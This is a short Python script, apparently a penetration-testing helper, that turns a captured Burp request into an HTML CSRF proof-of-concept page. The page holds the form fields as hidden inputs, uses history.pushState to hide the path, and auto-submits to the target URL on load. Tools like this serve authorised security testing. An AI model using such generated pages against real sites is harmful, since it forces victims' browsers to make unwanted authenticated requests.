import urllib.parse
# from html import escape as hesc


# Read the HTTP request from the file
with open("burp_request.txt", "r") as request_file:
    http_request_string = request_file.read()

# Split the request into components
request_lines = http_request_string.strip().split('\n')
request_line = request_lines[0]

method, path, http_version = request_line.split()


headers = {}
for line in request_lines[1:]:
    if not line.strip():
        break
    key, value = line.split(': ', 1)
    headers[key] = value

full_url = "https://" + headers["Host"] + path

body = request_lines[-1]  # Assuming the body is the last line in this example
pairs = body.split('&')
parsed_body = {}


def hesc(input_string):
    encoded_string = ""
    for char in input_string:
        if char.isalnum():
            # If the character is alphanumeric, append it as is
            encoded_string += char
        else:
            # If the character is not alphanumeric, encode it as an HTML entity
            encoded_string += f'&#{ord(char)};'

    return encoded_string



for pair in pairs:
    key, value = pair.split('=')
    key = urllib.parse.unquote(key)  # Decode URL-encoded key
    value = urllib.parse.unquote(value)  # Decode URL-encoded value
    parsed_body[hesc(key)] = hesc(value)


html_content = f"""
<html>
    <!-- CSRF PoC - generated by SeeAssArrAff -->
    <body>
        <form action="{full_url}" method="{method}">"""


if headers["Content-Type"] == "application/x-www-form-urlencoded":
    # print(parsed_body.items)
    for key, value in parsed_body.items():
        # print(key, value)
        html_content += f"""
            <input type="hidden" name="{key}" value="{value}" />"""


html_content += f"""
            <input type="submit" value="Submit request" />
        </form>
        <script>
            history.pushState('', '', '/');
            document.forms[0].submit();
        </script>
    </body>
</html>"""

print(html_content)


